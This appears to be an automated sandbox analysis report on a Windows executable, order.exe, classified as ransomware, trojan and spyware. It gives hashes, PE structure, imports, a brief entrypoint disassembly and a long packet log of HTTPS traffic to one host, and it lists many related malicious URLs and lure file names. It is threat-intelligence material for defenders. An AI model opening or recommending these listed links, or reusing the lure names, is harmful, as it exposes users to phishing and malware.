                                Analysis system description:Windows 10 64 bit v1803 with Office Professional Plus 2016, Chrome 85, IE 11, Adobe Reader DC 19, Java 8 Update 211
                                Number of analysed new started processes analysed:25
                                Number of new started drivers analysed:0
                                Number of existing processes analysed:0
                                Number of existing drivers analysed:0
                                Number of injected processes analysed:1
                                Technologies:
                                • HCA enabled
                                • EGA enabled
                                • HDC enabled
                                • AMSI enabled
                                Analysis Mode:default
                                Analysis stop reason:Timeout
                                Detection:MAL
                                Classification:mal100.rans.troj.spyw.evad.winEXE@7/0@1/1
                                EGA Information:Failed
                                HDC Information:
                                • Successful, ratio: 20.7% (good quality ratio 17.9%)
                                • Quality average: 69.1%
                                • Quality standard deviation: 33.4%
                                HCA Information:
                                • Successful, ratio: 93%
                                • Number of executed functions: 219
                                • Number of non-executed functions: 187
                                Cookbook Comments:
                                • Adjust boot time
                                • Enable AMSI
                                • Found application associated with file extension: .exe
                                Warnings:
                                Show All
                                • Exclude process from analysis (whitelisted): MpCmdRun.exe, BackgroundTransferHost.exe, backgroundTaskHost.exe, SgrmBroker.exe, conhost.exe, svchost.exe, wuapihost.exe
                                • Excluded IPs from analysis (whitelisted): 104.43.139.144, 52.147.198.201, 23.210.248.85, 51.104.144.132, 2.20.142.209, 2.20.142.210, 8.253.95.121, 8.253.95.249, 8.253.95.120, 8.241.122.126, 67.26.81.254, 40.67.251.132, 52.155.217.156, 20.54.26.129, 92.122.213.247, 92.122.213.194, 51.104.139.180
                                • Excluded domains from analysis (whitelisted): au.download.windowsupdate.com.edgesuite.net, arc.msn.com.nsatc.net, fs-wildcard.microsoft.com.edgekey.net, fs-wildcard.microsoft.com.edgekey.net.globalredir.akadns.net, wns.notify.windows.com.akadns.net, a1449.dscg2.akamai.net, arc.msn.com, db5eap.displaycatalog.md.mp.microsoft.com.akadns.net, par02p.wns.notify.windows.com.akadns.net, db5p.wns.notify.windows.com.akadns.net, emea1.notify.windows.com.akadns.net, audownload.windowsupdate.nsatc.net, displaycatalog.mp.microsoft.com, watson.telemetry.microsoft.com, auto.au.download.windowsupdate.com.c.footprint.net, img-prod-cms-rt-microsoft-com.akamaized.net, prod.fs.microsoft.com.akadns.net, au-bg-shim.trafficmanager.net, displaycatalog-europeeap.md.mp.microsoft.com.akadns.net, client.wns.windows.com, fs.microsoft.com, displaycatalog.md.mp.microsoft.com.akadns.net, ris-prod.trafficmanager.net, e1723.g.akamaiedge.net, ctldl.windowsupdate.com, skypedataprdcolcus16.cloudapp.net, a767.dscg3.akamai.net, skypedataprdcoleus16.cloudapp.net, ris.api.iris.microsoft.com, umwatsonrouting.trafficmanager.net
                                • Report size exceeded maximum capacity and may have missing disassembly code.
                                • Report size getting too big, too many NtOpenKeyEx calls found.
                                • Report size getting too big, too many NtQueryValueKey calls found.

                                Simulations

                                Behavior and APIs

                                No simulations

                                Joe Sandbox View / Context

                                IPs

                                No context

                                Domains

                                No context

                                ASN

                                MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                                UNIFIEDLAYER-AS-1USDocumentation.478396766.docGet hashmaliciousBrowse
                                • 162.241.44.26
                                8OP0MEmSDd.dllGet hashmaliciousBrowse
                                • 192.232.229.53
                                Information-478224510.docGet hashmaliciousBrowse
                                • 192.232.229.53
                                ZcmAPc4xeE.dllGet hashmaliciousBrowse
                                • 162.241.44.26
                                7aKeSIV5Cu.dllGet hashmaliciousBrowse
                                • 192.232.229.53
                                qRMGCk1u96.dllGet hashmaliciousBrowse
                                • 192.232.229.53
                                qAm7u8G4lM.exeGet hashmaliciousBrowse
                                • 192.185.138.193
                                AWB# 9284730932.exeGet hashmaliciousBrowse
                                • 192.185.170.106
                                Document3327.xlsbGet hashmaliciousBrowse
                                • 198.57.244.39
                                POSH XANADU Order-SP-20093000-xlxs.xlsxGet hashmaliciousBrowse
                                • 192.185.144.204
                                dVcML4Zl0J.dllGet hashmaliciousBrowse
                                • 192.232.229.53
                                JTWtIx6ADf.dllGet hashmaliciousBrowse
                                • 192.232.229.53
                                yrV5qWOmi3.dllGet hashmaliciousBrowse
                                • 192.232.229.53
                                bGtm3bQKUj.exeGet hashmaliciousBrowse
                                • 192.185.41.224
                                http://sanwhyl.seclenght.ml/whelst/8728WKEE_773_JDG833.htmlGet hashmaliciousBrowse
                                • 162.214.72.58
                                https://app.box.com/s/frm9cufh9ljwjmsdcrv6gioilzlttstrGet hashmaliciousBrowse
                                • 162.241.41.34
                                https://pornshare.cyou/mnbvcgh/loiuhgf/Get hashmaliciousBrowse
                                • 162.241.143.221
                                Invoice_99012_476904.xlsmGet hashmaliciousBrowse
                                • 192.232.229.53
                                Invoice_37081_761967.xlsmGet hashmaliciousBrowse
                                • 162.241.44.26
                                https://juicytatesful.com/re/Get hashmaliciousBrowse
                                • 162.241.126.121

                                JA3 Fingerprints

                                MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                                37f463bf4616ecd445d4a1937da06e19http://45.95.168.116Get hashmaliciousBrowse
                                • 192.185.152.65
                                https://u7342898.ct.sendgrid.net/ls/click?upn=HCSIWZDf9Xl-2FB6XFKqg1zjEMCja-2BnYJ5hRYKkDjy2dSVqjHsLlv5ZMXJXnh9JLSzwabeBrvYMnX699odsYkKotv4jgW-2BTippSHf276Hpn3fz0kcusnYHGKND7vKQPAS7g42-2FTb5zb8CNq57r3z9Ilg-3D-3DWdrE_hNl5WjNXy0NQcJb9WqI7qh7uPLeU7UGDRahFCFKbQLS6qwym7zJ-2B-2BhWsSSLs8pHa1w9VDlWPsA7ahHsZZucjX2ktFkSy5vhVZT2L3Jxh6b-2FoboCHa2CJGLfF19s71-2FI3WPC7rECe-2BEO9fLwbfggsNq2V1-2FqgMhzgJQL411ZuD7Y8pECisPKLf0vf9WvB1fyVO9o6Euui31Jg3e-2FDialpg2CbkM21Us8J-2FBk13yWzh58-3DGet hashmaliciousBrowse
                                • 192.185.152.65
                                https://carolearmstrongrealestate.com/wpe/14ea332d0684051d9fef033a5f1607dd?usr=cnBlbmRsZXRvbkBkYXRlc3dlaXNlci5jb20=Get hashmaliciousBrowse
                                • 192.185.152.65
                                dde1df2ac5845a19823cabe182fcd870.exeGet hashmaliciousBrowse
                                • 192.185.152.65
                                https://prod.dfg152.ru/activate?key=23696252760045174930Get hashmaliciousBrowse
                                • 192.185.152.65
                                dde1df2ac5845a19823cabe182fcd870.exeGet hashmaliciousBrowse
                                • 192.185.152.65
                                BYRkah8GsZ.exeGet hashmaliciousBrowse
                                • 192.185.152.65
                                https://www.canva.com/design/DAEN3YdYVHw/zaVHWoDx-9G9l20JXWSBtg/view?utm_content=DAEN3YdYVHw&utm_campaign=designshare&utm_medium=link&utm_source=sharebuttonGet hashmaliciousBrowse
                                • 192.185.152.65
                                splwow64.exeGet hashmaliciousBrowse
                                • 192.185.152.65
                                NyUnwsFSCa.exeGet hashmaliciousBrowse
                                • 192.185.152.65
                                https://signup.kwikvpn.com/Get hashmaliciousBrowse
                                • 192.185.152.65
                                AWB# 9284730932.exeGet hashmaliciousBrowse
                                • 192.185.152.65
                                https://www.canva.com/design/DAENqED8UzU/0m_RcAQIILTwa79MyPG8KA/view?utm_content=DAENqED8UzU&utm_campaign=designshare&utm_medium=link&utm_source=sharebuttonGet hashmaliciousBrowse
                                • 192.185.152.65
                                https://akljsdhfas.selz.com/?Get hashmaliciousBrowse
                                • 192.185.152.65
                                doc2227740.xlsGet hashmaliciousBrowse
                                • 192.185.152.65
                                d11311145.xlsGet hashmaliciousBrowse
                                • 192.185.152.65
                                Original Shipment Document.exeGet hashmaliciousBrowse
                                • 192.185.152.65
                                PO#0007507_009389283882873PDF.exeGet hashmaliciousBrowse
                                • 192.185.152.65
                                MV GRAN LOBO 008.xlsxGet hashmaliciousBrowse
                                • 192.185.152.65
                                http://www.ericbess.com/ericblog/2008/03/03/wp-codebox/#examplesGet hashmaliciousBrowse
                                • 192.185.152.65

                                Dropped Files

                                No context

                                Created / dropped Files

                                No created / dropped files found

                                Static File Info

                                General

                                File type:PE32 executable (GUI) Intel 80386, for MS Windows
                                Entropy (8bit):5.4399922873178586
                                TrID:
                                • Win32 Executable (generic) a (10002005/4) 99.15%
                                • Win32 Executable Microsoft Visual Basic 6 (82127/2) 0.81%
                                • Generic Win/DOS Executable (2004/3) 0.02%
                                • DOS Executable Generic (2002/1) 0.02%
                                • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                                File name:order.exe
                                File size:86016
                                MD5:27d7951ec430f93458370a00272d823d
                                SHA1:195eef585ef2307027df1ff05678ea2be23ae25e
                                SHA256:306d4c4068a82c3c744c534054536b99a0887d71f194a0dcb689bfea9fd0e0f3
                                SHA512:babb2fb36ce35e3217662d5357909864be5b88b4ab7770eb6b2f8e5340bb2d0c8f42d3d8296a4615d9275df71cf4e3782c01bedae9306ce5e3db37d0e2d894e7
                                SSDEEP:768:y8vtiO7Y7AqC2tw9XFRSZzjIQVPVJwukLqjYA7H3KAp26y/fT9UT3rvvJ57p2GAs:GslqgJuZzwZ2YA7lps/fTaT3d5t2Gd
                                File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........#...B...B...B..L^...B...`...B...d...B..Rich.B..........PE..L....[._................. ...0...............0....@................

                                File Icon

                                Icon Hash:20047c7c70f0e004

                                Static PE Info

                                General

                                Entrypoint:0x4016d8
                                Entrypoint Section:.text
                                Digitally signed:false
                                Imagebase:0x400000
                                Subsystem:windows gui
                                Image File Characteristics:LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, RELOCS_STRIPPED
                                DLL Characteristics:
                                Time Stamp:0x5FB45BC5 [Tue Nov 17 23:24:53 2020 UTC]
                                TLS Callbacks:
                                CLR (.Net) Version:
                                OS Version Major:4
                                OS Version Minor:0
                                File Version Major:4
                                File Version Minor:0
                                Subsystem Version Major:4
                                Subsystem Version Minor:0
                                Import Hash:1df1cc653eca0e7ef0f1b96ca8b2c716

                                Entrypoint Preview

                                Instruction
                                push 00401880h
                                call 00007FA1FCA14093h
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                xor byte ptr [eax], al
                                add byte ptr [eax], al
                                inc eax
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add dh, dl
                                xor dh, byte ptr [ecx-05h]
                                dec esi
                                xlatb
                                inc eax
                                mov dh, D7h
                                dec ecx
                                and al, byte ptr [ebx-75h]
                                int3
                                sub eax, 00000000h
                                add byte ptr [eax], al
                                add dword ptr [eax], eax
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                call 00007FA265A43E34h
                                insd
                                insd
                                jne 00007FA1FCA14110h
                                bound ebp, dword ptr [ecx+6Fh]
                                insb
                                outsd
                                imul eax, dword ptr [bx+si], 00004108h
                                add byte ptr [eax], al
                                add bh, bh
                                int3
                                xor dword ptr [eax], eax
                                add byte ptr [ebp-0171FB81h], bh
                                xchg byte ptr [eax+44h], dl
                                xchg eax, ebp
                                adc al, 60h
                                bound esi, dword ptr [esi]
                                sbb ch, byte ptr [edi-4Ch]
                                mov dword ptr [B81D217Fh], eax
                                inc esi
                                fld qword ptr [ecx-65h]
                                xor eax, dword ptr [edx+ecx*8]

                                Data Directories

                                NameVirtual AddressVirtual Size Is in Section
                                IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                                IMAGE_DIRECTORY_ENTRY_IMPORT0x127640x28.text
                                IMAGE_DIRECTORY_ENTRY_RESOURCE0x150000x8f8.rsrc
                                IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                                IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                                IMAGE_DIRECTORY_ENTRY_BASERELOC0x00x0
                                IMAGE_DIRECTORY_ENTRY_DEBUG0x00x0
                                IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                                IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x00x0
                                IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x2280x20
                                IMAGE_DIRECTORY_ENTRY_IAT0x10000x148.text
                                IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                                IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x00x0
                                IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0

                                Sections

                                NameVirtual AddressVirtual SizeRaw SizeXored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                .text0x10000x11cb40x12000False0.413072374132data5.87967600882IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
                                .data0x130000x11f80x1000False0.00634765625data0.0IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_WRITE, IMAGE_SCN_MEM_READ
                                .rsrc0x150000x8f80x1000False0.16650390625data1.94842215904IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ

                                Resources

                                NameRVASizeTypeLanguageCountry
                                RT_ICON0x157c80x130data
                                RT_ICON0x154e00x2e8data
                                RT_ICON0x153b80x128GLS_BINARY_LSB_FIRST
                                RT_GROUP_ICON0x153880x30data
                                RT_VERSION0x151500x238dataItalianItaly

                                Imports

                                DLLImport
                                MSVBVM60.DLL_CIcos, _adj_fptan, __vbaVarMove, __vbaFreeVar, __vbaStrVarMove, __vbaFreeVarList, _adj_fdiv_m64, __vbaFreeObjList, _adj_fprem1, __vbaHresultCheckObj, _adj_fdiv_m32, __vbaLateMemSt, __vbaObjSet, _adj_fdiv_m16i, __vbaObjSetAddref, _adj_fdivr_m16i, __vbaFPFix, __vbaFpR8, _CIsin, __vbaChkstk, EVENT_SINK_AddRef, __vbaStrCmp, __vbaVarTstEq, __vbaI2I4, __vbaObjVar, __vbaCastObjVar, _adj_fpatan, __vbaLateIdCallLd, EVENT_SINK_Release, _CIsqrt, EVENT_SINK_QueryInterface, __vbaExceptHandler, _adj_fprem, _adj_fdivr_m64, __vbaFPException, __vbaI2Var, _CIlog, __vbaFileOpen, __vbaNew2, __vbaR8Str, _adj_fdiv_m32i, _adj_fdivr_m32i, __vbaStrCopy, __vbaVarSetObj, __vbaI4Str, __vbaFreeStrList, _adj_fdivr_m32, _adj_fdiv_r, __vbaVarTstNe, __vbaI4Var, __vbaVarDup, __vbaVarLateMemCallLd, __vbaFpI4, __vbaLateMemCallLd, _CIatan, __vbaStrMove, _allmul, _CItan, _CIexp, __vbaFreeObj, __vbaFreeStr

                                Version Infos

                                DescriptionData
                                Translation0x0410 0x04b0
                                InternalNamePENGESEDLERS
                                FileVersion2.00
                                CompanyNameKTS Division
                                ProductNameKTS Division
                                ProductVersion2.00
                                OriginalFilenamePENGESEDLERS.exe

                                Possible Origin

                                Language of compilation systemCountry where language is spokenMap
                                ItalianItaly

                                Network Behavior

                                Network Port Distribution

                                TCP Packets

                                TimestampSource PortDest PortSource IPDest IP
                                Nov 19, 2020 16:10:29.722503901 CET49735443192.168.2.7192.185.152.65
                                Nov 19, 2020 16:10:29.856817007 CET44349735192.185.152.65192.168.2.7
                                Nov 19, 2020 16:10:29.856966019 CET49735443192.168.2.7192.185.152.65
                                Nov 19, 2020 16:10:29.928909063 CET49735443192.168.2.7192.185.152.65
                                Nov 19, 2020 16:10:30.063019037 CET44349735192.185.152.65192.168.2.7
                                Nov 19, 2020 16:10:30.065047979 CET44349735192.185.152.65192.168.2.7
                                Nov 19, 2020 16:10:30.065067053 CET44349735192.185.152.65192.168.2.7
                                Nov 19, 2020 16:10:30.065084934 CET44349735192.185.152.65192.168.2.7
                                Nov 19, 2020 16:10:30.065140963 CET49735443192.168.2.7192.185.152.65
                                Nov 19, 2020 16:10:30.065181971 CET49735443192.168.2.7192.185.152.65
                                Nov 19, 2020 16:10:30.153759956 CET49735443192.168.2.7192.185.152.65
                                Nov 19, 2020 16:10:30.288382053 CET44349735192.185.152.65192.168.2.7
                                Nov 19, 2020 16:10:30.288482904 CET49735443192.168.2.7192.185.152.65
                                Nov 19, 2020 16:10:30.308345079 CET49735443192.168.2.7192.185.152.65
                                Nov 19, 2020 16:10:30.450371027 CET44349735192.185.152.65192.168.2.7
                                Nov 19, 2020 16:10:30.450412035 CET44349735192.185.152.65192.168.2.7
                                Nov 19, 2020 16:10:30.450459957 CET44349735192.185.152.65192.168.2.7
                                Nov 19, 2020 16:10:30.450503111 CET44349735192.185.152.65192.168.2.7
                                Nov 19, 2020 16:10:30.450540066 CET44349735192.185.152.65192.168.2.7
                                Nov 19, 2020 16:10:30.450573921 CET49735443192.168.2.7192.185.152.65
                                Nov 19, 2020 16:10:30.450577974 CET44349735192.185.152.65192.168.2.7
                                Nov 19, 2020 16:10:30.450618029 CET44349735192.185.152.65192.168.2.7
                                Nov 19, 2020 16:10:30.450633049 CET49735443192.168.2.7192.185.152.65
                                Nov 19, 2020 16:10:30.450654984 CET44349735192.185.152.65192.168.2.7
                                Nov 19, 2020 16:10:30.450664997 CET49735443192.168.2.7192.185.152.65
                                Nov 19, 2020 16:10:30.450695038 CET44349735192.185.152.65192.168.2.7
                                Nov 19, 2020 16:10:30.450735092 CET44349735192.185.152.65192.168.2.7
                                Nov 19, 2020 16:10:30.450751066 CET49735443192.168.2.7192.185.152.65
                                Nov 19, 2020 16:10:30.450779915 CET49735443192.168.2.7192.185.152.65
                                Nov 19, 2020 16:10:30.585038900 CET44349735192.185.152.65192.168.2.7
                                Nov 19, 2020 16:10:30.585112095 CET44349735192.185.152.65192.168.2.7
                                Nov 19, 2020 16:10:30.585174084 CET44349735192.185.152.65192.168.2.7
                                Nov 19, 2020 16:10:30.585206032 CET49735443192.168.2.7192.185.152.65
                                Nov 19, 2020 16:10:30.585227966 CET44349735192.185.152.65192.168.2.7
                                Nov 19, 2020 16:10:30.585248947 CET49735443192.168.2.7192.185.152.65
                                Nov 19, 2020 16:10:30.585268974 CET44349735192.185.152.65192.168.2.7
                                Nov 19, 2020 16:10:30.585314989 CET44349735192.185.152.65192.168.2.7
                                Nov 19, 2020 16:10:30.585391998 CET49735443192.168.2.7192.185.152.65
                                Nov 19, 2020 16:10:30.585411072 CET44349735192.185.152.65192.168.2.7
                                Nov 19, 2020 16:10:30.585458994 CET44349735192.185.152.65192.168.2.7
                                Nov 19, 2020 16:10:30.585499048 CET44349735192.185.152.65192.168.2.7
                                Nov 19, 2020 16:10:30.585520029 CET49735443192.168.2.7192.185.152.65
                                Nov 19, 2020 16:10:30.585555077 CET44349735192.185.152.65192.168.2.7
                                Nov 19, 2020 16:10:30.585599899 CET44349735192.185.152.65192.168.2.7
                                Nov 19, 2020 16:10:30.585607052 CET49735443192.168.2.7192.185.152.65
                                Nov 19, 2020 16:10:30.585623026 CET49735443192.168.2.7192.185.152.65
                                Nov 19, 2020 16:10:30.585637093 CET44349735192.185.152.65192.168.2.7
                                Nov 19, 2020 16:10:30.585664988 CET49735443192.168.2.7192.185.152.65
                                Nov 19, 2020 16:10:30.585678101 CET44349735192.185.152.65192.168.2.7
                                Nov 19, 2020 16:10:30.585695982 CET49735443192.168.2.7192.185.152.65
                                Nov 19, 2020 16:10:30.585719109 CET44349735192.185.152.65192.168.2.7
                                Nov 19, 2020 16:10:30.585767984 CET44349735192.185.152.65192.168.2.7
                                Nov 19, 2020 16:10:30.585772038 CET49735443192.168.2.7192.185.152.65
                                Nov 19, 2020 16:10:30.585813046 CET44349735192.185.152.65192.168.2.7
                                Nov 19, 2020 16:10:30.585851908 CET44349735192.185.152.65192.168.2.7
                                Nov 19, 2020 16:10:30.585874081 CET49735443192.168.2.7192.185.152.65
                                Nov 19, 2020 16:10:30.585891962 CET44349735192.185.152.65192.168.2.7
                                Nov 19, 2020 16:10:30.585927010 CET49735443192.168.2.7192.185.152.65
                                Nov 19, 2020 16:10:30.585932016 CET44349735192.185.152.65192.168.2.7
                                Nov 19, 2020 16:10:30.585968971 CET49735443192.168.2.7192.185.152.65
                                Nov 19, 2020 16:10:30.585988045 CET44349735192.185.152.65192.168.2.7
                                Nov 19, 2020 16:10:30.586002111 CET49735443192.168.2.7192.185.152.65
                                Nov 19, 2020 16:10:30.586045980 CET49735443192.168.2.7192.185.152.65
                                Nov 19, 2020 16:10:30.720097065 CET44349735192.185.152.65192.168.2.7
                                Nov 19, 2020 16:10:30.720124960 CET44349735192.185.152.65192.168.2.7
                                Nov 19, 2020 16:10:30.720138073 CET44349735192.185.152.65192.168.2.7
                                Nov 19, 2020 16:10:30.720149994 CET44349735192.185.152.65192.168.2.7
                                Nov 19, 2020 16:10:30.720168114 CET44349735192.185.152.65192.168.2.7
                                Nov 19, 2020 16:10:30.720185041 CET44349735192.185.152.65192.168.2.7
                                Nov 19, 2020 16:10:30.720201015 CET44349735192.185.152.65192.168.2.7
                                Nov 19, 2020 16:10:30.720221043 CET44349735192.185.152.65192.168.2.7
                                Nov 19, 2020 16:10:30.720232010 CET49735443192.168.2.7192.185.152.65
                                Nov 19, 2020 16:10:30.720241070 CET44349735192.185.152.65192.168.2.7
                                Nov 19, 2020 16:10:30.720258951 CET44349735192.185.152.65192.168.2.7
                                Nov 19, 2020 16:10:30.720273018 CET49735443192.168.2.7192.185.152.65
                                Nov 19, 2020 16:10:30.720277071 CET44349735192.185.152.65192.168.2.7
                                Nov 19, 2020 16:10:30.720294952 CET44349735192.185.152.65192.168.2.7
                                Nov 19, 2020 16:10:30.720304966 CET49735443192.168.2.7192.185.152.65
                                Nov 19, 2020 16:10:30.720309973 CET44349735192.185.152.65192.168.2.7
                                Nov 19, 2020 16:10:30.720321894 CET49735443192.168.2.7192.185.152.65
                                Nov 19, 2020 16:10:30.720326900 CET44349735192.185.152.65192.168.2.7
                                Nov 19, 2020 16:10:30.720345020 CET44349735192.185.152.65192.168.2.7
                                Nov 19, 2020 16:10:30.720355988 CET49735443192.168.2.7192.185.152.65
                                Nov 19, 2020 16:10:30.720365047 CET44349735192.185.152.65192.168.2.7
                                Nov 19, 2020 16:10:30.720382929 CET44349735192.185.152.65192.168.2.7
                                Nov 19, 2020 16:10:30.720387936 CET49735443192.168.2.7192.185.152.65
                                Nov 19, 2020 16:10:30.720398903 CET44349735192.185.152.65192.168.2.7
                                Nov 19, 2020 16:10:30.720413923 CET49735443192.168.2.7192.185.152.65
                                Nov 19, 2020 16:10:30.720417023 CET44349735192.185.152.65192.168.2.7
                                Nov 19, 2020 16:10:30.720434904 CET44349735192.185.152.65192.168.2.7
                                Nov 19, 2020 16:10:30.720446110 CET49735443192.168.2.7192.185.152.65
                                Nov 19, 2020 16:10:30.720451117 CET44349735192.185.152.65192.168.2.7
                                Nov 19, 2020 16:10:30.720468044 CET44349735192.185.152.65192.168.2.7
                                Nov 19, 2020 16:10:30.720482111 CET49735443192.168.2.7192.185.152.65
                                Nov 19, 2020 16:10:30.720484972 CET44349735192.185.152.65192.168.2.7
                                Nov 19, 2020 16:10:30.720496893 CET49735443192.168.2.7192.185.152.65
                                Nov 19, 2020 16:10:30.720504999 CET44349735192.185.152.65192.168.2.7
                                Nov 19, 2020 16:10:30.720524073 CET44349735192.185.152.65192.168.2.7
                                Nov 19, 2020 16:10:30.720532894 CET49735443192.168.2.7192.185.152.65
                                Nov 19, 2020 16:10:30.720541000 CET44349735192.185.152.65192.168.2.7
                                Nov 19, 2020 16:10:30.720550060 CET49735443192.168.2.7192.185.152.65
                                Nov 19, 2020 16:10:30.720557928 CET44349735192.185.152.65192.168.2.7
                                Nov 19, 2020 16:10:30.720576048 CET44349735192.185.152.65192.168.2.7
                                Nov 19, 2020 16:10:30.720592022 CET49735443192.168.2.7192.185.152.65
                                Nov 19, 2020 16:10:30.720592022 CET44349735192.185.152.65192.168.2.7
                                Nov 19, 2020 16:10:30.720609903 CET44349735192.185.152.65192.168.2.7
                                Nov 19, 2020 16:10:30.720612049 CET49735443192.168.2.7192.185.152.65
                                Nov 19, 2020 16:10:30.720626116 CET44349735192.185.152.65192.168.2.7
                                Nov 19, 2020 16:10:30.720649004 CET44349735192.185.152.65192.168.2.7
                                Nov 19, 2020 16:10:30.720653057 CET49735443192.168.2.7192.185.152.65
                                Nov 19, 2020 16:10:30.720674992 CET44349735192.185.152.65192.168.2.7
                                Nov 19, 2020 16:10:30.720690966 CET49735443192.168.2.7192.185.152.65
                                Nov 19, 2020 16:10:30.720691919 CET44349735192.185.152.65192.168.2.7
                                Nov 19, 2020 16:10:30.720707893 CET49735443192.168.2.7192.185.152.65
                                Nov 19, 2020 16:10:30.720709085 CET44349735192.185.152.65192.168.2.7
                                Nov 19, 2020 16:10:30.720726967 CET44349735192.185.152.65192.168.2.7
                                Nov 19, 2020 16:10:30.720736980 CET49735443192.168.2.7192.185.152.65
                                Nov 19, 2020 16:10:30.720743895 CET44349735192.185.152.65192.168.2.7
                                Nov 19, 2020 16:10:30.720753908 CET49735443192.168.2.7192.185.152.65
                                Nov 19, 2020 16:10:30.720762014 CET44349735192.185.152.65192.168.2.7
                                Nov 19, 2020 16:10:30.720779896 CET44349735192.185.152.65192.168.2.7
                                Nov 19, 2020 16:10:30.720787048 CET49735443192.168.2.7192.185.152.65
                                Nov 19, 2020 16:10:30.720802069 CET44349735192.185.152.65192.168.2.7
                                Nov 19, 2020 16:10:30.720807076 CET49735443192.168.2.7192.185.152.65
                                Nov 19, 2020 16:10:30.720849991 CET49735443192.168.2.7192.185.152.65
                                Nov 19, 2020 16:10:30.721024036 CET49735443192.168.2.7192.185.152.65
                                Nov 19, 2020 16:10:30.855240107 CET44349735192.185.152.65192.168.2.7
                                Nov 19, 2020 16:10:30.855317116 CET44349735192.185.152.65192.168.2.7
                                Nov 19, 2020 16:10:30.855357885 CET44349735192.185.152.65192.168.2.7
                                Nov 19, 2020 16:10:30.855417967 CET44349735192.185.152.65192.168.2.7
                                Nov 19, 2020 16:10:30.855423927 CET49735443192.168.2.7192.185.152.65
                                Nov 19, 2020 16:10:30.855463982 CET49735443192.168.2.7192.185.152.65
                                Nov 19, 2020 16:10:30.855470896 CET44349735192.185.152.65192.168.2.7
                                Nov 19, 2020 16:10:30.855493069 CET49735443192.168.2.7192.185.152.65
                                Nov 19, 2020 16:10:30.855520964 CET44349735192.185.152.65192.168.2.7
                                Nov 19, 2020 16:10:30.855617046 CET44349735192.185.152.65192.168.2.7
                                Nov 19, 2020 16:10:30.855649948 CET44349735192.185.152.65192.168.2.7
                                Nov 19, 2020 16:10:30.855686903 CET49735443192.168.2.7192.185.152.65
                                Nov 19, 2020 16:10:30.855700970 CET49735443192.168.2.7192.185.152.65
                                Nov 19, 2020 16:10:30.855700970 CET44349735192.185.152.65192.168.2.7
                                Nov 19, 2020 16:10:30.855709076 CET49735443192.168.2.7192.185.152.65
                                Nov 19, 2020 16:10:30.855731964 CET49735443192.168.2.7192.185.152.65
                                Nov 19, 2020 16:10:30.855756998 CET49735443192.168.2.7192.185.152.65
                                Nov 19, 2020 16:10:30.855768919 CET44349735192.185.152.65192.168.2.7
                                Nov 19, 2020 16:10:30.855823994 CET44349735192.185.152.65192.168.2.7
                                Nov 19, 2020 16:10:30.855871916 CET44349735192.185.152.65192.168.2.7
                                Nov 19, 2020 16:10:30.855906010 CET44349735192.185.152.65192.168.2.7
                                Nov 19, 2020 16:10:30.855937004 CET44349735192.185.152.65192.168.2.7
                                Nov 19, 2020 16:10:30.855961084 CET44349735192.185.152.65192.168.2.7
                                Nov 19, 2020 16:10:30.855984926 CET44349735192.185.152.65192.168.2.7
                                Nov 19, 2020 16:10:30.856014013 CET49735443192.168.2.7192.185.152.65
                                Nov 19, 2020 16:10:30.856017113 CET44349735192.185.152.65192.168.2.7
                                Nov 19, 2020 16:10:30.856049061 CET44349735192.185.152.65192.168.2.7
                                Nov 19, 2020 16:10:30.856053114 CET49735443192.168.2.7192.185.152.65
                                Nov 19, 2020 16:10:30.856075048 CET49735443192.168.2.7192.185.152.65
                                Nov 19, 2020 16:10:30.856077909 CET44349735192.185.152.65192.168.2.7
                                Nov 19, 2020 16:10:30.856082916 CET49735443192.168.2.7192.185.152.65
                                Nov 19, 2020 16:10:30.856087923 CET49735443192.168.2.7192.185.152.65
                                Nov 19, 2020 16:10:30.856091976 CET49735443192.168.2.7192.185.152.65
                                Nov 19, 2020 16:10:30.856096029 CET49735443192.168.2.7192.185.152.65
                                Nov 19, 2020 16:10:30.856108904 CET44349735192.185.152.65192.168.2.7
                                Nov 19, 2020 16:10:30.856118917 CET49735443192.168.2.7192.185.152.65
                                Nov 19, 2020 16:10:30.856132984 CET49735443192.168.2.7192.185.152.65
                                Nov 19, 2020 16:10:30.856141090 CET44349735192.185.152.65192.168.2.7
                                Nov 19, 2020 16:10:30.856163025 CET49735443192.168.2.7192.185.152.65
                                Nov 19, 2020 16:10:30.856178999 CET44349735192.185.152.65192.168.2.7
                                Nov 19, 2020 16:10:30.856184959 CET49735443192.168.2.7192.185.152.65
                                Nov 19, 2020 16:10:30.856213093 CET44349735192.185.152.65192.168.2.7
                                Nov 19, 2020 16:10:30.856231928 CET49735443192.168.2.7192.185.152.65
                                Nov 19, 2020 16:10:30.856244087 CET44349735192.185.152.65192.168.2.7
                                Nov 19, 2020 16:10:30.856256008 CET49735443192.168.2.7192.185.152.65
                                Nov 19, 2020 16:10:30.856275082 CET44349735192.185.152.65192.168.2.7
                                Nov 19, 2020 16:10:30.856292963 CET49735443192.168.2.7192.185.152.65
                                Nov 19, 2020 16:10:30.856304884 CET44349735192.185.152.65192.168.2.7
                                Nov 19, 2020 16:10:30.856334925 CET44349735192.185.152.65192.168.2.7
                                Nov 19, 2020 16:10:30.856355906 CET49735443192.168.2.7192.185.152.65
